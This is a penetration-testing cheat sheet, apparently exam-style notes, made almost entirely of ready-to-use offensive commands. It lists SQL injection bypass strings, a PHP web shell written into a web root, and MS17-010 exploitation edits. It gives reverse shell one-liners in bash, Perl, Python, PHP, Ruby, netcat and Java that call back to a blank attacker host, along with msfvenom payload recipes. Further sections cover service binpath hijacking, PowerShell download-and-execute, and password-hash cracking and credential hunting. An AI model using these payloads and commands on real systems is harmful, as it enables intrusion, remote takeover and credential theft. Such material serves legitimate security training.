Port Scanning

nmap -sC -sV -p- -oA nmap/all 
nmap -sU -vv -oA nmap/alludp
masscan -p22,80,445

Port Knocking

for x in 7000 8000 9000; do nmap -Pn --max-retries 0 -p $x; done


# Gobuster 3
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u -x html,php -t 20
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u -x html,php -k

curl -v
curl -k -v
curl -A "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

curl -v -X OPTIONS
davtest -url

nikto -h
uniscan -u -qweds

nmap -sV -p 443 --script=ssl-heartbleed
sslyze --regular

# Shellshock
nmap -sV -p- --script http-shellshock
nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls

# WordPress
wpscan --url --enumerate u

# Drupal
# https://github.com/droope/droopescan
droopescan scan drupal -u

# Joomla
# https://github.com/rezasp/joomscan
joomscan --url

# sqlmap crawl  
sqlmap -u --crawl=1

# sqlmap dump database  
sqlmap -u --dbms=mysql --dump

# sqlmap shell  
sqlmap -u --dbms=mysql --os-shell

# Upload php command injection file
union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php'

# Load file
union all select 1,2,3,4,load_file("c:/windows/system32/drivers/etc/hosts"),6

# Bypass
' or 1=1 LIMIT 1 --
' or 1=1 LIMIT 1 -- -
' or 1=1 LIMIT 1#
'or 1#
' or 1=1 --
' or 1=1 -- -

# PHP command injection from GET Request
<?php echo system($_GET["cmd"]);?>

# Alternative
<?php echo shell_exec($_GET["cmd"]);?>


nmap -p 445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse

nmap -p 445 -vv --script=smb-enum-shares.nse,smb-enum-users.nse

smbmap -u jsmith -p password1 -d workgroup -H

enum4linux -av

rpcclient -U ""

smbclient //
apt-get install -y cifs-utils
mount -t cifs /test

# Manual MS17-010 exploitation
# https://github.com/worawit/MS17-010
msfvenom -p windows/meterpreter/reverse_tcp lhost= lport=1337 -f exe > blue.exe

# Before
#smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
#service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')

# After
smb_send_file(smbConn, 'blue.exe', 'C', '/blue.exe')
service_exec(conn, r'cmd /c c:\\blue.exe')

# smbver.sh
if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi
if [ ! -z $2 ]; then rport=$2; else rport=139; fi
tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 10 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
echo "" && sleep .1

nmap --script=samba-vuln-cve-2012-1182  -p 139



onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings_onesixtyone.txt public

snmpwalk -v1 -c public


nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount

mount -t nfs /mnt/nfs

# Resources 
# https://github.com/bonsaiviking/NfSpy

SSH Tunneling

# https://github.com/sshuttle/sshuttle
sshuttle -vvr [email protected]

# Local port forwarding
ssh <gateway> -L <local port to listen>:<remote host>:<remote port>

# Remote port forwarding
ssh <gateway> -R <remote port to bind>:<local host>:<local port>

# Dynamic port forwarding
ssh -D <local proxy port> -p <remote port> <target>

# Plink local port forwarding
plink -l root -pw pass -R 3389:<localhost>:3389 <remote host>

Brute Force

# /etc/shadow
unshadow passwd shadow > unshadow.db
john unshadow.db --wordlist=/usr/share/wordlists/rockyou.txt

samdump2 SYSTEM SAM > winhashes.txt
john --format=LM --wordlist=/usr/share/wordlists/rockyou.txt winhashes.txt

# Hashcat SHA512 $6$ shadow file  
hashcat -m 1800 -a 0 hash.txt rockyou.txt --username

# Hashcat MD5 $1$ shadow file  
hashcat -m 500 -a 0 hash.txt rockyou.txt --username

# Hashcat MD5 Apache webdav file  
hashcat -m 1600 -a 0 hash.txt rockyou.txt

# Hashcat SHA1  
hashcat -m 100 -a 0 hash.txt rockyou.txt --force

# Hashcat WordPress  
hashcat -m 400 -a 0 --remove hash.txt rockyou.txt

hydra -l username -P /usr/share/wordlists/rockyou.txt http-post-form "/portal/xlogin/:user=^USER^&pass=^PASS^:invalid login"

hydra -l username -P /usr/share/wordlists/rockyou.txt https-post-form "/portal/xlogin/:user=^USER^&pass=^PASS^:S=302"

hydra -l username -P /usr/share/wordlists/fasttrack.txt ssh://
hydra -l username -P /usr/share/wordlists/fasttrack.txt
hydra -l username -P /usr/share/wordlists/fasttrack.txt rdp://


# Bash
bash -i >& /dev/tcp/ 0>&1

# Perl
perl -e 'use Socket;$i="";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

# Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

php -r '$sock=fsockopen("",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

# Ruby
ruby -rsocket -e'f=TCPSocket.open("",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

# Netcat
nc -e /bin/sh 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1234 >/tmp/f

# Java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])

# PHP reverse shell  
msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT=4443 -f raw -o shell.php

# Java WAR reverse shell  
msfvenom -p java/shell_reverse_tcp LHOST= LPORT=4443 -f war -o shell.war

# Linux bind shell  
msfvenom -p linux/x86/shell_bind_tcp LPORT=4443 -f c -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai

# Linux FreeBSD reverse shell  
msfvenom -p bsd/x64/shell_reverse_tcp LHOST= LPORT=4443 -f elf -o shell.elf

# Linux C reverse shell  
msfvenom  -p linux/x86/shell_reverse_tcp LHOST= LPORT=4443 -e x86/shikata_ga_nai -f c

# Windows non staged reverse shell  
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4443 -e x86/shikata_ga_nai -f exe -o non_staged.exe

# Windows Staged (Meterpreter) reverse shell  
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4443 -e x86/shikata_ga_nai -f exe -o meterpreter.exe

# Windows Python reverse shell  
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4443 EXITFUNC=thread -f python -o shell.py

# Windows ASP reverse shell  
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4443 -f asp -e x86/shikata_ga_nai -o shell.asp

# Windows ASPX reverse shell
msfvenom -f aspx -p windows/shell_reverse_tcp LHOST= LPORT=4443 -e x86/shikata_ga_nai -o shell.aspx

# Windows JavaScript reverse shell with nops  
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4443 -f js_le -e generic/none -n 18

# Windows Powershell reverse shell  
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4443 -e x86/shikata_ga_nai -i 9 -f psh -o shell.ps1

# Windows reverse shell excluding bad characters  
msfvenom -p windows/shell_reverse_tcp -a x86 LHOST= LPORT=4443 EXITFUNC=thread -f c -b "\x00\x04" -e x86/shikata_ga_nai

# Windows x64 bit reverse shell  
msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT=4443 -f exe -o shell.exe

# Windows reverse shell embedded into plink  
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4443 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe

Windows Privilege Escalation

# What system are we connected to?
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

# Get the hostname and username (if available)
echo %username%

# Get users
net users
net user [username]

# Networking stuff
ipconfig /all

# Printer?
route print

# ARP-arific
arp -A

# Active network connections
netstat -ano

# Firewall fun (Win XP SP2+ only)
netsh firewall show state
netsh firewall show config

# Scheduled tasks
schtasks /query /fo LIST /v

# Running processes to started services
tasklist /SVC
net start

# Driver madness

# WMIC fun (Win 7/8 -- XP requires admin)
wmic /?

# WMIC: check patch level
wmic qfe get Caption,Description,HotFixID,InstalledOn

# Search pathces for given patch
wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."

# AlwaysInstallElevated fun
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

# Other commands to run to hopefully get what we need
dir /s *pass* == *cred* == *vnc* == *.config*
findstr /si password *.xml *.ini *.txt
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

# Service permissions
sc query
sc qc [service_name]

# Accesschk stuff
# https://github.com/ankh2054/windows-pentest/tree/master/Privelege
# accesschk seems to get stuck on certain machines without /accepteula
accesschk.exe /accepteula 
accesschk.exe /accepteula -ucqv [service_name] 
accesschk.exe /accepteula -uwcqv "Authenticated Users" * 
accesschk.exe /accepteula -ucqv [service_name]

# Find all weak folder permissions per drive.
accesschk.exe /accepteula -uwdqs Users c:\
accesschk.exe /accepteula -uwdqs "Authenticated Users" c:\

# Find all weak file permissions per drive.
accesschk.exe /accepteula -uwqs Users c:\*.*
accesschk.exe /accepteula -uwqs "Authenticated Users" c:\*.*

# Binary planting
sc config [service_name] binpath= "C:\nc.exe -nv [RHOST] [RPORT] -e C:\WINDOWS\System32\cmd.exe"
sc config [service_name] obj= ".\LocalSystem" password= ""
sc qc [service_name] (to verify!)
net start [service_name]

# Search for passwords
dir /s *pass* == *cred* == *vnc* == *.config*
findstr /si password *.xml *.ini *.txt
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

sc qc upnphost
sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 1234 -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost

# If it fails because of a missing dependency, run the following:
sc config SSDPSRV start= auto
net start SSDPSRV
net start upnphost

# Or remove the dependency:
sc config upnphost depend= ""

# runas not working and have credentials? 
# runas.ps1
$username = 'user'
$password = 'password'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
Start-Process nc.exe -e cmd.exe 4444

powershell -ExecutionPolicy Bypass -File runas.ps1

powershell "IEX(New-Object Net.WebClient).downloadString('')"

powershell "(New-Object System.Net.WebClient).Downloadfile('', 'shell.exe')"

certutil -urlcache -f shell.exe

# Simple aspx shell
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("")
o = cmd.StdOut.Readall()

# Resources
# https://www.fuzzysecurity.com/tutorials/16.html
# https://guif.re/windowseop
# https://github.com/FuzzySecurity/PowerShell-Suite
# https://github.com/samratashok/nishang
# https://github.com/411Hall/JAWS
# https://github.com/PowerShellMafia/PowerSploit
# https://github.com/rasta-mouse/Sherlock
# https://github.com/ohpe/juicy-potato

Linux Privilege Escalation

# Enter while in reverse shell
python -c 'import pty; pty.spawn("/bin/bash")'

# Ctrl-Z
# In Kali
stty raw -echo && fg

# In reverse shell
export SHELL=bash
export TERM=xterm-256color

# Search for SUID
find / -perm -u=s -type f 2>/dev/null

# $PATH manipulation for SUID
cd /tmp
echo "/bin/sh" > ps
chmod 777 ps
echo $PATH
export PATH=/tmp:$PATH

# Writable /etc/passwd
openssl passwd -1 -salt user pass123
su - user

# Resources
# https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
# https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py
# https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh
# https://guif.re/linuxeop
# https://www.hackingarticles.in/linux-privilege-escalation-via-automated-script/
# https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/
# https://www.hackingarticles.in/linux-privilege-escalation-by-exploiting-cron-jobs/
# https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/
# https://gtfobins.github.io/

Buffer Overflow

# Payload
payload = "\x41" * <length> + <ret_address> + "\x90" * 16 + <shellcode> + "\x43" * <remaining_length>

# Pattern create
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <length>

# Pattern offset
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l <length> -q <address>

# nasm
nasm > jmp eax

# Bad characters
badchars = (
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" )

Client Side Attack

/usr/lib/jvm/java-8-openjdk-i386/bin/javac -source 1.7 -target 1.7 Java.java

echo "Permissions: all-permissions" > /root/manifest.txt

/usr/lib/jvm/java-8-openjdk-i386/bin/jar cvf Java.jar Java.class

/usr/lib/jvm/java-8-openjdk-i386/bin/keytool -genkey -alias signapplet -keystore mykeystore -keypass mykeypass -storepass password123

/usr/lib/jvm/java-8-openjdk-i386/bin/jarsigner -keystore mykeystore -storepass password123 -keypass mykeypass -signedjar SignedJava.jar Java.jar signapplet

cp Java.class SignedJava.jar /var/www/html/